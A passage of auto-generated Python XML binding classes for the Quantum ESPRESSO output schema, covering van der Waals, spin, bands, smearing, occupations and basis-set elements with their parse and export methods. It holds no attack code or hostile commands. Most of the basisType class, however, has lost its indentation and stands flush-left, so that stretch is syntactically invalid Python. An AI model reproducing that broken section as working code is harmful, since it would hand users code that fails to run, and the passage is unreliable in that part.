        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element into the matching attribute, validating its type."""
        if nodeName_ == 'vdw_corr':
            vdw_corr_ = child_.text
            vdw_corr_ = self.gds_validate_string(vdw_corr_, node, 'vdw_corr')
            self.vdw_corr = vdw_corr_
        elif nodeName_ == 'non_local_term':
            non_local_term_ = child_.text
            non_local_term_ = self.gds_validate_string(non_local_term_, node, 'non_local_term')
            self.non_local_term = non_local_term_
        elif nodeName_ == 'london_s6' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'london_s6')
            self.london_s6 = fval_
        elif nodeName_ == 'ts_vdw_econv_thr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ts_vdw_econv_thr')
            self.ts_vdw_econv_thr = fval_
        elif nodeName_ == 'ts_vdw_isolated':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'ts_vdw_isolated')
            self.ts_vdw_isolated = ival_
        elif nodeName_ == 'london_rcut' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'london_rcut')
            self.london_rcut = fval_
        elif nodeName_ == 'xdm_a1' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'xdm_a1')
            self.xdm_a1 = fval_
        elif nodeName_ == 'xdm_a2' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'xdm_a2')
            self.xdm_a2 = fval_
        elif nodeName_ == 'london_c6':
            # london_c6 shares the HubbardCommonType structure (specie/label + value).
            obj_ = HubbardCommonType.factory()
            obj_.build(child_)
            self.london_c6.append(obj_)
            obj_.original_tagname_ = 'london_c6'
# end class vdWType
class spinType(GeneratedsSuper):
    """Generated XML binding for the `spinType` schema type.

    Three optional boolean children: ``lsda``, ``noncolin``, ``spinorbit``.
    """
    subclass = None
    superclass = None
    def __init__(self, lsda=None, noncolin=None, spinorbit=None):
        self.original_tagname_ = None
        self.lsda = lsda
        self.noncolin = noncolin
        self.spinorbit = spinorbit
    def factory(*args_, **kwargs_):
        """Construct an instance, honoring subclass-module and `subclass` overrides."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, spinType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if spinType.subclass:
            return spinType.subclass(*args_, **kwargs_)
        else:
            return spinType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_lsda(self): return self.lsda
    def set_lsda(self, lsda): self.lsda = lsda
    def get_noncolin(self): return self.noncolin
    def set_noncolin(self, noncolin): self.noncolin = noncolin
    def get_spinorbit(self): return self.spinorbit
    def set_spinorbit(self, spinorbit): self.spinorbit = spinorbit
    def hasContent_(self):
        # True if any child element is present.
        if (
            self.lsda is not None or
            self.noncolin is not None or
            self.spinorbit is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='spinType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('spinType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='spinType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='spinType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='spinType'):
        # This type defines no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='spinType', fromsubclass_=False, pretty_print=True):
        """Write each non-None boolean child, in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.lsda is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:lsda>%s</qes:lsda>%s' % (self.gds_format_boolean(self.lsda, input_name='lsda'), eol_))
        if self.noncolin is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:noncolin>%s</qes:noncolin>%s' % (self.gds_format_boolean(self.noncolin, input_name='noncolin'), eol_))
        if self.spinorbit is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:spinorbit>%s</qes:spinorbit>%s' % (self.gds_format_boolean(self.spinorbit, input_name='spinorbit'), eol_))
    def build(self, node):
        """Populate this object from an ElementTree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one boolean child element; accepts 'true'/'1'/'false'/'0' only."""
        if nodeName_ == 'lsda':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'lsda')
            self.lsda = ival_
        elif nodeName_ == 'noncolin':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'noncolin')
            self.noncolin = ival_
        elif nodeName_ == 'spinorbit':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'spinorbit')
            self.spinorbit = ival_
# end class spinType
class bandsType(GeneratedsSuper):
    """Generated XML binding for the `bandsType` schema type.

    Children: positive-integer ``nbnd``, complex-typed ``smearing`` and
    ``occupations`` (delegated to their own binding classes), doubles
    ``tot_charge`` and ``tot_magnetization``, and a repeatable
    ``inputOccupations`` element.
    """
    subclass = None
    superclass = None
    def __init__(self, nbnd=None, smearing=None, tot_charge=None, tot_magnetization=None, occupations=None, inputOccupations=None):
        self.original_tagname_ = None
        self.nbnd = nbnd
        self.smearing = smearing
        self.tot_charge = tot_charge
        self.tot_magnetization = tot_magnetization
        self.occupations = occupations
        # Default to a fresh list per instance (never a shared mutable default).
        if inputOccupations is None:
            self.inputOccupations = []
        else:
            self.inputOccupations = inputOccupations
    def factory(*args_, **kwargs_):
        """Construct an instance, honoring subclass-module and `subclass` overrides."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, bandsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if bandsType.subclass:
            return bandsType.subclass(*args_, **kwargs_)
        else:
            return bandsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_nbnd(self): return self.nbnd
    def set_nbnd(self, nbnd): self.nbnd = nbnd
    def get_smearing(self): return self.smearing
    def set_smearing(self, smearing): self.smearing = smearing
    def get_tot_charge(self): return self.tot_charge
    def set_tot_charge(self, tot_charge): self.tot_charge = tot_charge
    def get_tot_magnetization(self): return self.tot_magnetization
    def set_tot_magnetization(self, tot_magnetization): self.tot_magnetization = tot_magnetization
    def get_occupations(self): return self.occupations
    def set_occupations(self, occupations): self.occupations = occupations
    def get_inputOccupations(self): return self.inputOccupations
    def set_inputOccupations(self, inputOccupations): self.inputOccupations = inputOccupations
    def add_inputOccupations(self, value): self.inputOccupations.append(value)
    def insert_inputOccupations_at(self, index, value): self.inputOccupations.insert(index, value)
    def replace_inputOccupations_at(self, index, value): self.inputOccupations[index] = value
    def hasContent_(self):
        # True if any child element is present (non-None scalar or non-empty list).
        if (
            self.nbnd is not None or
            self.smearing is not None or
            self.tot_charge is not None or
            self.tot_magnetization is not None or
            self.occupations is not None or
            self.inputOccupations
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='bandsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('bandsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='bandsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='bandsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='bandsType'):
        # This type defines no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='bandsType', fromsubclass_=False, pretty_print=True):
        """Write each non-None child; complex children delegate to their own export()."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.nbnd is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nbnd>%s</qes:nbnd>%s' % (self.gds_format_integer(self.nbnd, input_name='nbnd'), eol_))
        if self.smearing is not None:
            self.smearing.export(outfile, level, namespaceprefix_, name_='smearing', pretty_print=pretty_print)
        if self.tot_charge is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:tot_charge>%s</qes:tot_charge>%s' % (self.gds_format_double(self.tot_charge, input_name='tot_charge'), eol_))
        if self.tot_magnetization is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:tot_magnetization>%s</qes:tot_magnetization>%s' % (self.gds_format_double(self.tot_magnetization, input_name='tot_magnetization'), eol_))
        if self.occupations is not None:
            self.occupations.export(outfile, level, namespaceprefix_, name_='occupations', pretty_print=pretty_print)
        for inputOccupations_ in self.inputOccupations:
            inputOccupations_.export(outfile, level, namespaceprefix_, name_='inputOccupations', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element into the matching attribute, validating its type."""
        if nodeName_ == 'nbnd' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            # Schema constrains nbnd to xs:positiveInteger.
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nbnd')
            self.nbnd = ival_
        elif nodeName_ == 'smearing':
            obj_ = smearingType.factory()
            obj_.build(child_)
            self.smearing = obj_
            obj_.original_tagname_ = 'smearing'
        elif nodeName_ == 'tot_charge' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'tot_charge')
            self.tot_charge = fval_
        elif nodeName_ == 'tot_magnetization' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'tot_magnetization')
            self.tot_magnetization = fval_
        elif nodeName_ == 'occupations':
            obj_ = occupationsType.factory()
            obj_.build(child_)
            self.occupations = obj_
            obj_.original_tagname_ = 'occupations'
        elif nodeName_ == 'inputOccupations':
            obj_ = inputOccupationsType.factory()
            obj_.build(child_)
            self.inputOccupations.append(obj_)
            obj_.original_tagname_ = 'inputOccupations'
# end class bandsType
class smearingType(GeneratedsSuper):
    """Generated XML binding for the `smearingType` schema type.

    A simple-content element (text value in ``valueOf_``) with one
    float attribute, ``degauss``.
    """
    subclass = None
    superclass = None
    def __init__(self, degauss=None, valueOf_=None):
        self.original_tagname_ = None
        self.degauss = _cast(float, degauss)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Construct an instance, honoring subclass-module and `subclass` overrides."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, smearingType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if smearingType.subclass:
            return smearingType.subclass(*args_, **kwargs_)
        else:
            return smearingType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_degauss(self): return self.degauss
    def set_degauss(self, degauss): self.degauss = degauss
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric zero still counts as content; only None/empty text does not.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='smearingType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('smearingType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='smearingType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='smearingType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='smearingType'):
        """Emit the `degauss` attribute (at most once), formatted as a double."""
        if self.degauss is not None and 'degauss' not in already_processed:
            already_processed.add('degauss')
            outfile.write(' degauss="%s"' % self.gds_format_double(self.degauss, input_name='degauss'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='smearingType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass
    def build(self, node):
        """Populate this object from an ElementTree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read and float-convert the `degauss` attribute; raises ValueError if malformed."""
        value = find_attr_value_('degauss', node)
        if value is not None and 'degauss' not in already_processed:
            already_processed.add('degauss')
            try:
                self.degauss = float(value)
            except ValueError as exp:
                raise ValueError('Bad float/double attribute (degauss): %s' % exp)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class smearingType
class occupationsType(GeneratedsSuper):
    """Generated XML binding for the `occupationsType` schema type.

    A simple-content element (text value in ``valueOf_``) with one
    positive-integer attribute, ``spin``.
    """
    subclass = None
    superclass = None
    def __init__(self, spin=None, valueOf_=None):
        self.original_tagname_ = None
        self.spin = _cast(int, spin)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Construct an instance, honoring subclass-module and `subclass` overrides."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, occupationsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if occupationsType.subclass:
            return occupationsType.subclass(*args_, **kwargs_)
        else:
            return occupationsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_spin(self): return self.spin
    def set_spin(self, spin): self.spin = spin
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric zero still counts as content; only None/empty text does not.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='occupationsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('occupationsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='occupationsType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='occupationsType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='occupationsType'):
        """Emit the `spin` attribute (at most once), formatted as an integer."""
        if self.spin is not None and 'spin' not in already_processed:
            already_processed.add('spin')
            outfile.write(' spin="%s"' % self.gds_format_integer(self.spin, input_name='spin'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='occupationsType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass
    def build(self, node):
        """Populate this object from an ElementTree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the `spin` attribute; must parse as a positive integer."""
        value = find_attr_value_('spin', node)
        if value is not None and 'spin' not in already_processed:
            already_processed.add('spin')
            try:
                self.spin = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.spin <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class occupationsType
class basisType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, gamma_only=None, ecutwfc=None, ecutrho=None, fft_grid=None, fft_smooth=None, fft_box=None):
self.original_tagname_ = None
self.gamma_only = gamma_only
self.ecutwfc = ecutwfc
self.ecutrho = ecutrho
self.fft_grid = fft_grid
self.fft_smooth = fft_smooth
self.fft_box = fft_box
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, basisType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if basisType.subclass:
return basisType.subclass(*args_, **kwargs_)
else:
return basisType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_gamma_only(self): return self.gamma_only
def set_gamma_only(self, gamma_only): self.gamma_only = gamma_only
def get_ecutwfc(self): return self.ecutwfc
def set_ecutwfc(self, ecutwfc): self.ecutwfc = ecutwfc
def get_ecutrho(self): return self.ecutrho
def set_ecutrho(self, ecutrho): self.ecutrho = ecutrho
def get_fft_grid(self): return self.fft_grid
def set_fft_grid(self, fft_grid): self.fft_grid = fft_grid
def get_fft_smooth(self): return self.fft_smooth
def set_fft_smooth(self, fft_smooth): self.fft_smooth = fft_smooth
def get_fft_box(self): return self.fft_box
def set_fft_box(self, fft_box): self.fft_box = fft_box
def hasContent_(self):
if (
self.gamma_only is not None or
self.ecutwfc is not None or
self.ecutrho is not None or
self.fft_grid is not None or
self.fft_smooth is not None or
self.fft_box is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='basisType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('basisType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='basisType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='basisType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='basisType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='basisType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.gamma_only is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:gamma_only>%s</qes:gamma_only>%s' % (self.gds_format_boolean(self.gamma_only, input_name='gamma_only'), eol_))
if self.ecutwfc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutwfc>%s</qes:ecutwfc>%s' % (self.gds_format_double(self.ecutwfc, input_name='ecutwfc'), eol_))
if self.ecutrho is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutrho>%s</qes:ecutrho>%s' % (self.gds_format_double(self.ecutrho, input_name='ecutrho'), eol_))
if self.fft_grid is not None:
self.fft_grid.export(outfile, level, namespaceprefix_, name_='fft_grid', pretty_print=pretty_print)
if self.fft_smooth is not None:
self.fft_smooth.export(outfile, level, namespaceprefix_, name_='fft_smooth', pretty_print=pretty_print)
if self.fft_box is not None:
self.fft_box.export(outfile, level, namespaceprefix_, name_='fft_box', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
    def buildAttributes(self, node, attrs, already_processed):
        # basisType declares no XML attributes in the schema, so nothing to parse.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of a basisType node and store its value."""
        if nodeName_ == 'gamma_only':
            sval_ = child_.text
            # xsd:boolean accepts only the literals true/false/1/0.
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'gamma_only')
            self.gamma_only = ival_
        elif nodeName_ == 'ecutwfc' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ecutwfc')
            self.ecutwfc = fval_
        elif nodeName_ == 'ecutrho' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ecutrho')
            self.ecutrho = fval_
        # fft_grid / fft_smooth / fft_box are complex basisSetItemType elements,
        # built recursively; original_tagname_ preserves the element name for export.
        elif nodeName_ == 'fft_grid':
            obj_ = basisSetItemType.factory()
            obj_.build(child_)
            self.fft_grid = obj_
            obj_.original_tagname_ = 'fft_grid'
        elif nodeName_ == 'fft_smooth':
            obj_ = basisSetItemType.factory()
            obj_.build(child_)
            self.fft_smooth = obj_
            obj_.original_tagname_ = 'fft_smooth'
        elif nodeName_ == 'fft_box':
            obj_ = basisSetItemType.factory()
            obj_.build(child_)
            self.fft_box = obj_
            obj_.original_tagname_ = 'fft_box'
# end class basisType
class basis_setType(GeneratedsSuper):
    """Generated binding for the qes `basis_setType` complex type.

    Holds the plane-wave basis description of an output record: cutoffs
    (ecutwfc, ecutrho), the gamma_only flag, the three FFT grids
    (fft_grid, fft_smooth, fft_box — basisSetItemType), the plane-wave
    counts (ngm, ngms, npwx — positive integers) and the
    reciprocal_lattice element.  Auto-generated by generateDS; do not
    edit by hand.
    """
    subclass = None
    superclass = None
    def __init__(self, gamma_only=None, ecutwfc=None, ecutrho=None, fft_grid=None, fft_smooth=None, fft_box=None, ngm=None, ngms=None, npwx=None, reciprocal_lattice=None):
        self.original_tagname_ = None
        self.gamma_only = gamma_only
        self.ecutwfc = ecutwfc
        self.ecutrho = ecutrho
        self.fft_grid = fft_grid
        self.fft_smooth = fft_smooth
        self.fft_box = fft_box
        self.ngm = ngm
        self.ngms = ngms
        self.npwx = npwx
        self.reciprocal_lattice = reciprocal_lattice
    def factory(*args_, **kwargs_):
        # Standard generateDS factory: prefer a user-supplied subclass module,
        # then the `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, basis_setType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if basis_setType.subclass:
            return basis_setType.subclass(*args_, **kwargs_)
        else:
            return basis_setType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_gamma_only(self): return self.gamma_only
    def set_gamma_only(self, gamma_only): self.gamma_only = gamma_only
    def get_ecutwfc(self): return self.ecutwfc
    def set_ecutwfc(self, ecutwfc): self.ecutwfc = ecutwfc
    def get_ecutrho(self): return self.ecutrho
    def set_ecutrho(self, ecutrho): self.ecutrho = ecutrho
    def get_fft_grid(self): return self.fft_grid
    def set_fft_grid(self, fft_grid): self.fft_grid = fft_grid
    def get_fft_smooth(self): return self.fft_smooth
    def set_fft_smooth(self, fft_smooth): self.fft_smooth = fft_smooth
    def get_fft_box(self): return self.fft_box
    def set_fft_box(self, fft_box): self.fft_box = fft_box
    def get_ngm(self): return self.ngm
    def set_ngm(self, ngm): self.ngm = ngm
    def get_ngms(self): return self.ngms
    def set_ngms(self, ngms): self.ngms = ngms
    def get_npwx(self): return self.npwx
    def set_npwx(self, npwx): self.npwx = npwx
    def get_reciprocal_lattice(self): return self.reciprocal_lattice
    def set_reciprocal_lattice(self, reciprocal_lattice): self.reciprocal_lattice = reciprocal_lattice
    def hasContent_(self):
        """Return True when any child element is set (element is non-empty)."""
        if (
            self.gamma_only is not None or
            self.ecutwfc is not None or
            self.ecutrho is not None or
            self.fft_grid is not None or
            self.fft_smooth is not None or
            self.fft_box is not None or
            self.ngm is not None or
            self.ngms is not None or
            self.npwx is not None or
            self.reciprocal_lattice is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='basis_setType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (tag + attributes + children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('basis_setType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Use the tag this object was parsed from, not the type name.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='basis_setType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='basis_setType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='basis_setType'):
        # basis_setType declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='basis_setType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order, skipping those set to None."""
        if pretty_print:
            eol_ = '\n'
        else:
